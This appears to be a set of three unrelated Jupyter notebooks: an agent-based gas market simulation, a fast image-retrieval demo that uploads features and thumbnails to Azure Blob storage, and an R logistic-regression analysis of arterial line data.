def get_bids(self):
# this is a data frame
ledger = self.book.get_ledger()
rows= ledger.loc[ledger['role'] == 'buyer']
# this is a series
prices=rows['price']
# this is a list
bids = prices.tolist()
return bids
def get_asks(self):
# this is a data frame
ledger = self.book.get_ledger()
rows = ledger.loc[ledger['role'] == 'seller']
# this is a series
prices=rows['price']
# this is a list
asks = prices.tolist()
return asks
# return the price at which the market clears
# this fails because there are more buyers then sellers
def get_clearing_price(self):
# buyer makes a bid starting with the buyer which wants it most
b = self.get_bids()
s = self.get_asks()
# highest to lowest
self.b=sorted(b, reverse=True)
# lowest to highest
self.s=sorted(s, reverse=False)
# find out whether there are more buyers or sellers
# then drop the excess buyers or sellers; they won't compete
n = len(b)
m = len(s)
# there are more sellers than buyers
# drop off the highest priced sellers
if (m > n):
s = s[0:n]
matcher = n
# There are more buyers than sellers
# drop off the lowest bidding buyers
else:
b = b[0:m]
matcher = m
# -It's possible that not all items sold actually clear the market here
# -Produces an error when one of the two lists are empty
# something like 'can't compare string and float'
count = 0
for i in range(matcher):
if (self.b[i] > self.s[i]):
count +=1
self.last_price = self.b[i]
# copy count to market object
self.count = count
return self.last_price
# TODO: Annotate the ledger
# this procedure takes up 80% of processing time
def annotate_ledger(self,clearing_price):
ledger = self.book.get_ledger()
# logic test
# b or s can not be zero, probably error or unreliable results
# so annote everything as false in that case and move on
b = self.get_bids()
s = self.get_asks()
if (len(s)==0 or len(b)==0):
new_col = [ 'False' for i in range(len(ledger['cleared']))]
ledger['cleared'] = new_col
self.book.update_ledger(ledger)
return
# end logic test
for index, row in ledger.iterrows():
if (row['role'] == 'seller'):
if (row['price'] < clearing_price):
ledger.loc[index,'cleared'] = 'True'
else:
ledger.loc[index,'cleared'] = 'False'
else:
if (row['price'] > clearing_price):
ledger.loc[index,'cleared'] = 'True'
else:
ledger.loc[index,'cleared'] = 'False'
self.book.update_ledger(ledger)
def get_units_cleared(self):
return self.count
def clean_ledger(self):
self.ledger = ''
self.book.clean_ledger()
def run_it(self):
self.pre_clearing_operation()
self.clearing_operation()
self.after_clearing_operation()
# pre clearing empty out the last run and start
# clean ledger is kind of sloppy, rewrite functions to overide the ledger
def pre_clearing_operation(self):
self.clean_ledger()
def clearing_operation(self):
self.set_book()
clearing_price = self.get_clearing_price()
if print_details:
print(self.name, clearing_price)
self.annotate_ledger(clearing_price)
def after_clearing_operation(self):
for agent in self.seller_list:
name = agent.name
cur_extract = len(self.book.ledger[(self.book.ledger['cleared'] == 'True') &
(self.book.ledger['name'] == name)])
agent.extract(cur_extract)
agent.get_price(self.last_price)
self.seller_analytics[name] = cur_extract
if cur_extract >0:
agent_asks = agent.get_asks()
agent_asks = sorted(agent_asks, reverse=False)
not_cleared = agent_asks[cur_extract:len(agent_asks)]
agent.return_not_cleared(not_cleared)
for agent in self.buyer_list:
name = agent.name
cur_extract = len(self.book.ledger[(self.book.ledger['cleared'] == 'True') &
(self.book.ledger['name'] == name)])
agent.get_price(self.last_price)
self.buyer_analytics[name] = cur_extract
if cur_extract >0:
agent_bids = agent.get_bids()
agent_bids = sorted(agent_bids, reverse=True)
not_cleared = agent_bids[cur_extract:len(agent_bids)]
agent.return_not_cleared(not_cleared)
# cleaning up the books
self.book_keeping_all()
```
## Observer
The observer holds the clock and collects data. In this setup it tells the market another tick has past and it is time to act. The market will instruct the other agents. The observer initializes the model, thereby making real objects out of the classes defined above.
```
class Observer():
def __init__(self, init_buyer, init_seller, timesteps, scenario):
self.init_buyer = init_buyer
self.init_seller = init_seller
self.init_market = init_market
self.maxrun = timesteps
self.cur_scenario = scenario
self.buyer_dict = {}
self.seller_dict = {}
self.market_dict = {}
self.timetick = 0
self.gas_market = ''
self.market_hist = []
self.seller_hist = []
self.buyer_hist = []
self.market_origin = []
self.market_origin_df = pd.DataFrame(columns=['seller_analytics','buyer_analytics'])
self.all_data = {}
def set_buyer(self, buyer_info):
for name in buyer_info:
self.buyer_dict[name] = Buyer('%s' % name)
self.buyer_dict[name].base_demand = buyer_info[name]['offset']
self.buyer_dict[name].base_demand = buyer_info[name]['b']
self.buyer_dict[name].max_demand = buyer_info[name]['m']
self.buyer_dict[name].lb_price = buyer_info[name]['lb_price']
self.buyer_dict[name].ub_price = buyer_info[name]['ub_price']
self.buyer_dict[name].type = buyer_info[name]['type']
self.buyer_dict[name].rof = buyer_info[name]['rof']
self.buyer_dict[name].cur_scenario = self.cur_scenario
self.buyer_dict[name].subscr_market = dict.fromkeys(init_market,0)
for market in buyer_info[name]['market']:
self.buyer_dict[name].subscr_market[market] = 1
def set_seller(self, seller_info):
for name in seller_info:
self.seller_dict[name] = Seller('%s' % name)
self.seller_dict[name].prod = seller_info[name]['prod']
self.seller_dict[name].lb_price = seller_info[name]['lb_price']
self.seller_dict[name].ub_price = seller_info[name]['ub_price']
self.seller_dict[name].reserve = seller_info[name]['reserve']
self.seller_dict[name].init_reserve = seller_info[name]['reserve']
self.seller_dict[name].unproven_reserve = seller_info[name]['UP_reserve']
self.seller_dict[name].init_unproven_reserve = seller_info[name]['UP_reserve']
#self.seller_dict[name].rof = seller_info[name]['rof']
self.seller_dict[name].cur_scenario = self.cur_scenario
self.seller_dict[name].subscr_market = dict.fromkeys(init_market,0)
for market in seller_info[name]['market']:
self.seller_dict[name].subscr_market[market] = 1
def set_market(self, market_info):
for name in market_info:
self.market_dict[name] = Market('%s' % name)
#add suplliers and buyers to this market
for supplier in self.seller_dict.values():
self.market_dict[name].add_seller(supplier)
for buyer in self.buyer_dict.values():
self.market_dict[name].add_buyer(buyer)
self.market_dict[name].seller_dict = self.seller_dict
self.market_dict[name].buyer_dict = self.buyer_dict
def update_buyer(self):
for i in self.buyer_dict:
self.buyer_dict[i].step += 1
self.buyer_dict[i].set_quantity()
def update_seller(self):
for i in self.seller_dict:
self.seller_dict[i].step += 1
self.seller_dict[i].set_quantity()
def evaluate_timestep(self):
for i in self.buyer_dict:
self.buyer_dict[i].evaluate_timestep()
for i in self.seller_dict:
self.seller_dict[i].evaluate_timestep()
def get_reserve(self):
reserve = []
for name in self.seller_dict:
reserve.append(self.seller_dict[name].reserve)
return reserve
def get_data(self):
for name in self.seller_dict:
self.all_data[name] = self.seller_dict[name].state_hist
for name in self.buyer_dict:
self.all_data[name] = self.buyer_dict[name].state_hist
def run_it(self):
# Timing
# time initialising
startit_init = time.time()
# initialise, setting up all the agents (firstrun not really needed anymore, since outside the loop)
# might become useful again if run_it is used for parametersweep
first_run = True
if first_run:
self.set_buyer(self.init_buyer)
self.set_seller(self.init_seller)
self.set_market(self.init_market)
first_run=False
# time init stop
stopit_init = time.time() - startit_init
if print_details:
print('%s : initialisation time' % stopit_init)
# building the multiindex for origin dataframe
listing = []
for m in self.market_dict:
listing_buyer = [(runname, m,'buyer_analytics',v.name) for v in self.market_dict[m].buyer_list]
listing = listing + listing_buyer
listing_seller = [(runname, m,'seller_analytics',v.name) for v in self.market_dict[m].seller_list]
listing = listing + listing_seller
multi_listing = pd.MultiIndex.from_tuples(listing)
# recording everything in dataframes, more dependable than lists?
#reserve_df = pd.DataFrame(data=None, columns=[i for i in self.seller_dict])
#iterables = [[i for i in self.market_dict], ['buyer_analytics', 'seller_analytics']]
#index = pd.MultiIndex.from_product(iterables)
market_origin_df = pd.DataFrame(data=None, columns=multi_listing)
for period in range(self.maxrun):
# time the period
startit_period = time.time()
self.timetick += 1
period_now = add_months(period_null, self.timetick-1)
if print_details:
print('#######################################')
print(period_now.strftime('%Y-%b'), self.cur_scenario)
# update the buyers and sellers (timetick+ set Q)
self.update_buyer()
self.update_seller()
# real action on the market
for market in self.market_dict:
if market != 'lng':
self.market_dict[market].run_it()
self.market_dict['lng'].run_it()
#tell buyers timetick has past
self.evaluate_timestep()
# data collection
for name in self.market_dict:
p_clearing = self.market_dict[name].last_price
q_sold = self.market_dict[name].count
self.market_hist.append([period_now.strftime('%Y-%b'), p_clearing, q_sold, name])
for name in self.seller_dict:
reserve = self.seller_dict[name].reserve
produced = self.seller_dict[name].count
self.seller_hist.append([period_now.strftime('%Y-%b'), reserve, produced, name])
for name in self.buyer_dict:
storage = self.buyer_dict[name].storage
consumed = self.buyer_dict[name].count
self.buyer_hist.append([period_now.strftime('%Y-%b'), storage, consumed, name])
# means to caption the origin of stuff sold on the market,
# but since dictionaries are declared global of some sort
# Dataframe has to be used to capture the real values
for name in self.market_dict:
seller_analytics = self.market_dict[name].seller_analytics
buyer_analytics = self.market_dict[name].buyer_analytics
for seller in seller_analytics:
market_origin_df.loc[period_now.strftime('%Y-%b'),
(runname, name,'seller_analytics',seller)] = seller_analytics[seller]
for buyer in buyer_analytics:
market_origin_df.loc[period_now.strftime('%Y-%b'),
(runname, name,'buyer_analytics',buyer)] = buyer_analytics[buyer]
# recording the step_info
# since this operation can take quite a while, print after every operation
period_time = time.time() - startit_period
if print_details:
print('%.2f : seconds to clear period' % period_time)
#safe df as attribute
self.market_origin_df = market_origin_df
```
## Example Market
In the following code example we use the buyer and supplier objects to create a market. At the market a single price is announced which causes as many units of goods to be swapped as possible. The buyers and sellers stop trading when it is no longer in their own interest to continue.
```
# import scenarios
inputfile = 'economic growth scenarios.xlsx'
# economic growth percentages
economic_growth = pd.read_excel(inputfile, sheetname='ec_growth', index_col=0, header=[0,1])
## demand for electricity import scenarios spaced by excel
#elec_space = pd.read_excel(inputfile, sheetname='elec_space', skiprows=1, index_col=0, header=0)
# demand for electricity import scenarios spaced by excel
elec_space = pd.read_excel(inputfile, sheetname='elec_space', index_col=0, header=[0,1])
# gasdemand home (percentage increases)
home_savings = {'PACES': 1.01, 'TIDES': .99, 'CIRCLES': .97}
# multilevel ecgrowth
economic_growth2 = pd.read_excel(inputfile, sheetname='ec_growth', index_col=0, header=[0,1])
#economic_growth2['ECONOMIC GROWTH']
# reading excel initialization data back
read_file = 'init_buyers_sellers_lng.xlsx'
df_buyer = pd.read_excel(read_file,orient='index',sheetname='buyers')
df_seller = pd.read_excel(read_file,orient='index',sheetname='sellers')
df_buyer['market'] = [eval(i) for i in df_buyer['market'].values]
df_seller['market'] = [eval(i) for i in df_seller['market'].values]
init_buyer = df_buyer.to_dict('index')
init_seller = df_seller.to_dict('index')
#init_market = {'eu', 'us','as'}, construct markets by unique values
market = []
for i in init_seller:
for x in init_seller[i]['market']: market.append(x)
for i in init_buyer:
for x in init_buyer[i]['market']: market.append(x)
market = list(set(market))
init_market = market
# set the starting time
period_null= datetime.date(2013,1,1)
```
## run the model
To run the model we create the observer. The observer creates all the other objects and runs the model.
```
# create observer and run the model
# first data about buyers then sellers and then model ticks
years = 35
# timestep = 12
print_details = False
run_market = {}
run_seller = {}
run_buyer = {}
run_market_origin = {}
run_market_origin_df = {}
for i in ['PACES', 'CIRCLES', 'TIDES']:
runname = i
dtrunstart = datetime.datetime.now()
print('\n%s scenario %d year run started' %(i,years))
obser1 = Observer(init_buyer, init_seller, years*12, i)
obser1.run_it()
#get the info from the observer
run_market[i] = obser1.market_hist
run_seller[i] = obser1.seller_hist
run_buyer[i] = obser1.buyer_hist
run_market_origin_df[i] = obser1.market_origin_df
#run_data[i] = obser1.all_data
dtrunstop = datetime.datetime.now()
print('%s scenario %d year run finished' %(i,years))
print('this run took %s (h:m:s) to complete'% (dtrunstop - dtrunstart))
# timeit
stopit = time.time()
dtstopit = datetime.datetime.now()
print('it took us %s seconds to get to this conclusion' % (stopit-startit))
print('in another notation (h:m:s) %s'% (dtstopit - dtstartit))
```
## Operations Research Formulation
The market can also be formulated as a very simple linear program or linear complementarity problem. It is clearer and easier to implement this market clearing mechanism with agents. One merit of the agent-based approach is that we don't need linear or linearizable supply and demand function.
The auctioneer is effectively following a very simple linear program subject to constraints on units sold. The auctioneer is, in the primal model, maximizing the consumer utility received by customers, with respect to the price being paid, subject to a fixed supply curve. On the dual side the auctioneer is minimizing the cost of production for the supplier, with respect to quantity sold, subject to a fixed demand curve. It is the presumed neutrality of the auctioneer which justifies the honest statement of supply and demand.
An alternative formulation is a linear complementarity problem. Here the presence of an optimal space of trades ensures that there is a Pareto optimal front of possible trades. The perfect opposition of interests in dividing the consumer and producer surplus means that this is a zero sum game. Furthermore the solution to this zero-sum game maximizes societal welfare and is therefore the Hicks optimal solution.
## Next Steps
A possible addition of this model would be to have a weekly varying demand of customers, for instance caused by the use of natural gas as a heating agent. This would require the bids and asks to be time varying, and for the market to be run over successive time periods. A second addition would be to create transport costs, or enable intermediate goods to be produced. This would need a more elaborate market operator. Another possible addition would be to add a profit maximizing broker. This may require adding belief, fictitious play, or message passing.
The object-orientation of the models will probably need to be further rationalized. Right now the market requires very particular ordering of calls to function correctly.
## Time of last run
Time and date of the last run of this notebook file
```
# print the time of last run
print('last run of this notebook:')
time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime())
```
## Plotting scenario runs
For the scenario runs we vary the external factors according to the scenarios. Real plotting is done in a seperate visualization file
```
plt.subplots()
for market in init_market:
for i in run_market:
run_df = pd.DataFrame(run_market[i])
run_df = run_df[run_df[3]==market]
run_df.set_index(0, inplace=True)
run_df.index = pd.to_datetime(run_df.index)
run_df.index.name = 'month'
run_df.rename(columns={1: 'price', 2: 'quantity'}, inplace=True)
run_df = run_df['price'].resample('A').mean().plot(label=i, title=market)
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
plt.ylabel('€/MWh')
plt.xlabel('Year')
plt.show();
```
### saving data for later
To keep this file as clear as possible and for efficiency we visualize the results in a separate file. To transfer the model run data we use the Json library (and possibly excel).
```
today = datetime.date.today().strftime('%Y%m%d')
outputexcel = '.\exceloutput\%srun.xlsx' %today
writer = pd.ExcelWriter(outputexcel)
def write_to_excel():
for i in run_market:
run_df = pd.DataFrame(run_market[i])
run_df.set_index(0, inplace=True)
run_df.index = pd.to_datetime(run_df.index)
run_df.index.name = 'month'
run_df.rename(columns={1: 'price', 2: 'quantity'}, inplace=True)
run_df.to_excel(writer, sheet_name=i)
# uncomment if wanted to write to excel file
#write_to_excel()
# Writing JSON data
# market data
data = run_market
with open('marketdata.json', 'w') as f:
json.dump(data, f)
# seller/reserve data
data = run_seller
with open('sellerdata.json', 'w') as f:
json.dump(data, f)
# buyer data
data = run_buyer
with open('buyerdata.json', 'w') as f:
json.dump(data, f)
# complex dataframes do not work well with Json, so use Pickle
# Merge Dataframes
result = pd.concat([run_market_origin_df[i] for i in run_market_origin_df], axis=1)
#pickle does the job
result.to_pickle('marketdataorigin.pickle', compression='infer', protocol=4)
# testing if complex frames did what it is expected to do
df_pickle = result
for i in df_pickle.columns.levels[0]:
scen=i
market='eu'
df = df_pickle[scen][market]['seller_analytics']
df.index = pd.to_datetime(df.index)
df.resample('A').sum().plot.area(title='%s %s'%(scen,market))
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
plt.show()
```
| github_jupyter |
<i>Copyright (c) Microsoft Corporation. All rights reserved.</i>
<i>Licensed under the MIT License.</i>
# Fast image retrieval
In the notebook [01_training_and_evaluation_introduction.ipynb](01_training_and_evaluation_introduction.ipynb) we perform image retrieval by computing the distances between a query image and *all* reference images. While computing the L2 distance between two images is fast, for large datasets of tens of thousands of images this exhaustive search can be a bottleneck for real-time applications.
To speed up image retrieval, this notebook shows how to implement an approximate nearest neighbor method designed to work well for large datasets (N) and high-dimensional features (D). For example, the well-known Ball Tree approach has a complexity of O\[D\*log(N)\], compared to O\[D\*N\] for exhaustive search.
## Initialization
```
# Ensure edits to libraries are loaded and plotting is shown in the notebook.
%matplotlib inline
%reload_ext autoreload
%autoreload 2
# Standard python libraries
import sys
import numpy as np
from pathlib import Path
import random
import scrapbook as sb
from sklearn.neighbors import NearestNeighbors
from tqdm import tqdm
# Fast.ai
import fastai
from fastai.vision import (
load_learner,
cnn_learner,
DatasetType,
ImageList,
imagenet_stats,
models,
PIL
)
# Computer Vision repository
sys.path.extend([".", "../.."]) # to access the utils_cv library
from utils_cv.classification.data import Urls
from utils_cv.common.data import unzip_url
from utils_cv.common.gpu import which_processor, db_num_workers
from utils_cv.similarity.metrics import compute_distances
from utils_cv.similarity.model import compute_features_learner
from utils_cv.similarity.plot import plot_distances, plot_ranks_distribution
print(f"Fast.ai version = {fastai.__version__}")
which_processor()
```
## Data preparation
We start with parameter specifications and data preparation. We use the *Fridge objects* dataset, which is composed of 134 images, divided into 4 classes: can, carton, milk bottle and water bottle.
```
# Data location
DATA_PATH = unzip_url(Urls.fridge_objects_path, exist_ok=True)
# Image reader configuration
BATCH_SIZE = 16
IM_SIZE = 300
# Number of comparison of nearest neighbor versus exhaustive search for accuracy computation
NUM_RANK_ITER = 100
# Load images into fast.ai's ImageDataBunch object
random.seed(642)
data = (
ImageList.from_folder(DATA_PATH)
.split_by_rand_pct(valid_pct=0.8, seed=20)
.label_from_folder()
.transform(size=IM_SIZE)
.databunch(bs=BATCH_SIZE, num_workers = db_num_workers())
.normalize(imagenet_stats)
)
print(f"Training set: {len(data.train_ds.x)} images, validation set: {len(data.valid_ds.x)} images")
```
## Load model
Below we load a [ResNet18](https://arxiv.org/pdf/1512.03385.pdf) CNN from fast.ai's library which is pre-trained on ImageNet.
```
# learn = cnn_learner(data, models.resnet18, ps=0)
#print(DATA_PATH)
learn = load_learner(DATA_PATH, 'image_similarity_01_model')
learn.data = data
```
Alternatively, one can load a model which was trained using the [01_training_and_evaluation_introduction.ipynb](01_training_and_evaluation_introduction.ipynb) notebook using these lines of code:
```python
learn = load_learner(".", 'image_similarity_01_model')
learn.data = data
```
## Feature extraction
We now compute the DNN features for each image in our validation set. We use the output of the penultimate layer as our image representation, which, for the Resnet-18 model has a dimensionality of 512 floating point values.
```
# Use penultimate layer as image representation
embedding_layer = learn.model[1][-2]
print(embedding_layer)
# Compute DNN features for all validation images
valid_features = compute_features_learner(data, DatasetType.Valid, learn, embedding_layer)
print(f"Computed DNN features for the {len(list(valid_features))} validation images,\
each consisting of {len(valid_features[list(valid_features)[0]])} floating point values.\n")
print(valid_features[list(valid_features)[0]])
```
## Image Retrieval Example
In the cells below, we demonstrate how to do fast image retrieval using scikit-learn's [NearestNeighbors](https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.NearestNeighbors.html) implementation. Note that we use the same approach to computing distances as in the [01_training_and_evaluation_introduction.ipynb](01_training_and_evaluation_introduction.ipynb) notebook, i.e. we normalize the feature vectors to be of unit length, and chose "Euclidean" distance.
First, we build a nearest neighbor object using appropriately normalized features.
```
# Normalize all reference features to be of unit length
valid_features_list = np.array(list(valid_features.values()))
# print(valid_features_list[0])
valid_features_list /= np.linalg.norm(valid_features_list, axis=1)[:,None]
#print(np.array2string(valid_features_list, separator=', '))
test = ",".join(map(str,valid_features_list[0]))
import zipfile
from zipfile import ZipFile
f = open("ref_features.txt", 'w')
f.write('[')
f.writelines('],\n'.join('[' + ','.join(map(str,i)) for i in valid_features_list))
f.write(']]')
f.close()
print(DATA_PATH)
#print(list(valid_features.keys()))
f = open("ref_filenames.txt", 'w')
f.write('["')
f.writelines('",\n"'.join((i[len(DATA_PATH)+1:]).replace("/","_").replace("\\","_") for i in valid_features.keys()))
f.write('"]')
f.close()
# writing files to zipfiles, one by one
with ZipFile('ref_features.zip','w', zipfile.ZIP_DEFLATED) as zip:
zip.write("ref_features.txt")
with ZipFile('ref_filenames.zip','w', zipfile.ZIP_DEFLATED) as zip:
zip.write("ref_filenames.txt")
#print(valid_features_list[0][1])
# print(len(valid_features_list))
#print(test)
#c = np.savetxt('geekfile.gz', valid_features_list, fmt='%f', delimiter =', ', newline=']')
#a = open("geekfile.txt", 'r')# open file in read mode
#print("the file contains:")
#print(a.read())
#print(valid_features_list.shape)
# Build nearest neighbor object using the reference set
nn_orig = NearestNeighbors(algorithm='auto', metric='euclidean', n_neighbors=min(100,len(valid_features_list)))
nn_orig.fit(valid_features_list)
nn_orig
#Above changed from 'nn' to 'nn_orig' to demonstrate saving the nn object to disk and then restoring it from disk
```
Next, we resize the reference images to 256x256 in a new directory called 'small-150'
```
import os
path_mr = 'small-150'
Path(path_mr).mkdir(parents=True, exist_ok=True)
MAX_SIZE = (150, 150)
def resize():
for root, dirs, files in os.walk(DATA_PATH):
for file in files:
if file.endswith(".jpg"):
fname = path_mr +'/' + root[len(DATA_PATH)+1:] + '_' + file
im = PIL.Image.open(os.path.join(root, file))
im.thumbnail(MAX_SIZE)
im.save(fname, 'JPEG', quality=70)
resize()
```
Next we upload the files to Azure Blob storage
```
import os, uuid
import azure.storage.blob
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, ContentSettings
# Check Storage SDK version number
print(f"Azure Blob Storage SDK Version: {azure.storage.blob.VERSION}")
azure_storage_connection_str = 'YOUR_CONNECTION_STRING'
container_name = 'YOUR_CONTAINER_NAME'
local_files = ['ref_filenames.zip','ref_features.zip','../visualize/index.html','../visualize/dist/jszip.min.js','../visualize/dist/jszip-utils.min.js']
blob_files = ['data/ref_filenames.zip','data/ref_features.zip','index.html','dist/jszip.min.js','dist/jszip-utils.min.js']
# Create the BlobServiceClient object which will be used to create a container client
blob_service_client = BlobServiceClient.from_connection_string(azure_storage_connection_str)
# Upload the individual files for the front-end and the ZIP files for reference features
i = 0
while (i < len(local_files)):
# Create a blob client using the local file name as the name for the blob
blob_client = blob_service_client.get_blob_client(container=container_name, blob=blob_files[i])
# Upload the file
with open(local_files[i], "rb") as data:
if (i==2):
blob_client.upload_blob(data, overwrite=True, content_settings=ContentSettings(content_type="text/html"))
else:
blob_client.upload_blob(data, overwrite=True)
i+=1
# Upload the thumbnail versions of the reference images
path_mr = 'small-150'
for root, dirs, files in os.walk(path_mr):
for file in files:
# Create a blob client using the local file name as the name for the blob
blob_client = blob_service_client.get_blob_client(container=container_name, blob=path_mr+'/'+file)
# Upload the file
with open(os.path.join(path_mr, file), "rb") as data:
blob_client.upload_blob(data, overwrite=True)
```
Next, we export the NN features to disk (saved as a Python "Pickle" binary object
```
# Import the pickle library to allow saving python objects to disk
import pickle
# Open the file in binary write mode
nn_pickle = open('nnreference_file', 'wb')
# Put the nn features in memory into the file
pickle.dump(nn_orig, nn_pickle)
```
Next we load the saved NN features from disk for further processing and queries
```
nn = pickle.load(open('nnreference_file', 'rb'))
query_im_path = str(data.valid_ds.items[1])
query_feature = valid_features[query_im_path]
print(f"Query image path: {query_im_path}")
print(f"Query feature dimension: {len(query_feature)}")
assert len(query_feature) == 512 # For Resnet-18 model
```
Finally, we use the nearest neighbor object for image retrieval. It is important that the query feature is normalized in exactly the same way as the features used to initilize the nearest-neighbor object.
```
# Normalize the query feature vector to be of unit length
query_feature /= np.linalg.norm(query_feature, 2)
query_feature = np.reshape(query_feature, (-1, len(query_feature)))
# Query the nearest neighbor object to find the top most similar reference images
approx_distances, approx_im_indices = nn.kneighbors(query_feature)
# Display the results
approx_im_paths = [str(data.valid_ds.items[i]) for i in approx_im_indices[0]]
plot_distances(list(zip(approx_im_paths, approx_distances[0])),
num_rows=1, num_cols=8, figsize=(17,5))
# Compute features for the training set from which query images will be randomly selected
train_features = compute_features_learner(data, DatasetType.Train, learn, embedding_layer)
print(f"Computed DNN features for the {len(list(train_features))} training images, \
each consisting of {len(train_features[list(train_features)[0]])} floating point values.")
```
## Retrieval speed
This section compares retrieval times of exhaustive search versus approximate nearest neighbor search by running the respective algorithms multiple times.
Exhaustive search is fast for the small dataset provided with this notebook. However, when using even a modestly sized dataset of 5,000 images, exhaustive-search takes already 0.1 seconds per query while nearest-neighbor search takes 5ms, a 20 times speedup at virtually no loss in accuracy. For a dataset with 100,000 images, exhaustive search increases to 2.1 seconds, while our nearest neighbor search remains 20 times faster.
More speed-gains (however possibly at the loss of retrieval accuracy) can be gained by selecting different parameters for the *NearestNeighbors* object. For information on this topic see the [scikit-learn site](https://scikit-learn.org/stable/modules/neighbors.html).
```
%%timeit
query_im_path = str(np.random.choice(data.train_ds.items))
query_feature = train_features[query_im_path]
distances = compute_distances(query_feature, valid_features)
%%timeit
query_im_path = str(np.random.choice(data.train_ds.items))
query_feature = train_features[query_im_path]
query_feature /= np.linalg.norm(query_feature, 2)
query_feature = np.reshape(query_feature, (-1, len(query_feature)))
approx_distances, approx_im_indices = nn.kneighbors(query_feature)
```
## Retrieval accuracy
Nearest neighbor methods are much faster than brute-force search, however can sometimes be incorrect. That is, given a query image, the most similar image as returned by the nearest neighbor object does in fact not have the lowest L2 distance.
To measure retrieval accuracy we use brute-force search to find the *true* image with lowest distance, and then compare at what rank our nearest neighbor search places this image. Ideally we would like the approximate nearest neighbor method to also identify the *true* image as the one with minimum distance, ie have a rank of 1. The higher the rank, the worse.
The code below computes the average of this rank using 100 randomly and independently selected query images. Interestingly, even when using a large dataset of 100,000 images, we found that in the majority of cases the output of the nearest neighbor search is identical (but much faster) compared to brute-force.
```
ranks = []
for iter in tqdm(range(NUM_RANK_ITER)):
# Get random query image
query_im_path = str(np.random.choice(data.train_ds.items))
query_feature = train_features[query_im_path]
assert len(query_feature) == 512
# Find closest match (ie. most similar image) using brute-force search
bf_distances_and_paths = compute_distances(query_feature, valid_features)
bf_distances = [d for (p,d) in bf_distances_and_paths]
bf_closest_match_path = bf_distances_and_paths[np.argmin(bf_distances)][0]
# Find closest match (ie. most similar image) using nearest-neighbor search
query_feature /= np.linalg.norm(query_feature, 2)
query_feature = np.reshape(query_feature, (-1, len(query_feature)))
approx_distances, approx_im_indices = nn.kneighbors(query_feature)
# Find at what position (ie rank) the brute-force result is within the nearest-neighbor search result
# Best: rank 1.
approx_im_paths = [str(data.valid_ds.items[i]) for i in approx_im_indices[0]]
rank = np.where(np.array(approx_im_paths) == bf_closest_match_path)[0]
assert len(rank) == 1
assert approx_im_paths[int(rank)] == bf_closest_match_path
ranks.append(float(rank)+1)
print(f"The median rank over {len(ranks)} runs with {len(valid_features)} reference images is {np.median(ranks)}, and average rank is {np.mean(ranks)}.")
# Display the distribution of ranks
plot_ranks_distribution(ranks)
# Log some outputs using scrapbook which are used during testing to verify correct notebook execution
sb.glue("feature_dimension", len(query_feature[0]))
sb.glue("median_rank", np.median(ranks))
```
| github_jupyter |
```
system("ln -s /home/ec2-user/anaconda3/envs/R_Beta/bin/x86_64-conda_cos6-linux-gnu-c++ /home/ec2-user/anaconda3/bin/x86_64-conda_cos6-linux-gnu-c++")
system("ln -s /home/ec2-user/anaconda3/envs/R_Beta/bin/x86_64-conda_cos6-linux-gnu-cc /home/ec2-user/anaconda3/bin/x86_64-conda_cos6-linux-gnu-cc")
install.packages('pROC')
install.packages('Matching')
knitr::opts_chunk$set(echo = TRUE)
wdpath = path.expand("./")
setwd(wdpath)
dataset = read.csv(file="aline_data.csv",head=TRUE,sep=",")
dataset$icustay_id = factor(dataset$icustay_id)
dataset$day_28_flag = factor(dataset$day_28_flag, levels=c(0,1))
dataset$gender = factor(dataset$gender, levels=c("F","M"))
dataset$day_icu_intime = factor(dataset$day_icu_intime)
dataset$hour_icu_intime = factor(dataset$hour_icu_intime)
dataset$icu_hour_flag = factor(dataset$icu_hour_flag, levels=c(0,1))
#dataset$sepsis_flag = factor(dataset$sepsis_flag, levels=c(0,1))
dataset$sedative_flag = factor(dataset$sedative_flag, levels=c(0,1))
dataset$fentanyl_flag = factor(dataset$fentanyl_flag, levels=c(0,1))
dataset$midazolam_flag = factor(dataset$midazolam_flag, levels=c(0,1))
dataset$propofol_flag = factor(dataset$propofol_flag, levels=c(0,1))
#dataset$dilaudid_flag = factor(dataset$dilaudid_flag, levels=c(0,1))
dataset$chf_flag = factor(dataset$chf_flag, levels=c(0,1))
dataset$afib_flag = factor(dataset$afib_flag, levels=c(0,1))
dataset$renal_flag = factor(dataset$renal_flag, levels=c(0,1))
dataset$liver_flag = factor(dataset$liver_flag, levels=c(0,1))
dataset$copd_flag = factor(dataset$copd_flag, levels=c(0,1))
dataset$cad_flag = factor(dataset$cad_flag, levels=c(0,1))
dataset$stroke_flag = factor(dataset$stroke_flag, levels=c(0,1))
dataset$malignancy_flag = factor(dataset$malignancy_flag, levels=c(0,1))
dataset$respfail_flag = factor(dataset$respfail_flag, levels=c(0,1))
dataset$ards_flag = factor(dataset$ards_flag, levels=c(0,1))
dataset$pneumonia_flag = factor(dataset$pneumonia_flag, levels=c(0,1))
# custom factor
dataset$service_surg = factor( dataset$service_unit == 'SURG', levels=c(FALSE,TRUE))
# we could impute data if we like - e.g. the below imputes the mean
# we currently do complete case analysis however
imputeFlag = 0
if (imputeFlag != 0){
print("Imputing missing data for some features...")
for (col in c("weight_first","temp_first","spo2_first",
"bun_first","creatinine_first", "chloride_first", "hgb_first",
"platelet_first", "potassium_first", "sodium_first", "tco2_first", "wbc_first"))
{
print(paste("Imputing data for: ", col))
dataset[is.na(dataset[,col]),col] = mean(dataset[,col], na.rm=TRUE)
}
}
# subselect the variables
dat = dataset[,c("aline_flag",
"age","gender","weight_first","sofa_first","service_surg",
"day_icu_intime","hour_icu_intime",
"chf_flag","afib_flag","renal_flag",
"liver_flag","copd_flag","cad_flag","stroke_flag",
"malignancy_flag","respfail_flag",
"map_first","hr_first","temp_first","spo2_first",
"bun_first","chloride_first","creatinine_first",
"hgb_first","platelet_first",
"potassium_first","sodium_first","tco2_first","wbc_first")]
idxKeep = complete.cases(dat)
dat = dat[idxKeep,]
y <- dataset[idxKeep,"day_28_flag"]
print(paste('Removed', sum(!idxKeep),'rows with missing data.'))
# fit GLM
glm_fitted = glm(aline_flag ~ ., data=dat, family="binomial", na.action = na.exclude)
# run step-wise AIC
library(MASS);
glm_fitted <- stepAIC(glm_fitted )
X <- fitted(glm_fitted, type="response")
Tr <- dat$aline_flag
library("pROC")
roccurve <- roc(Tr ~ X)
plot(roccurve, col=rainbow(7), main="ROC curve", xlab="Specificity", ylab="Sensitivity")
auc(roccurve)
# plot stacked histogram of the predictions
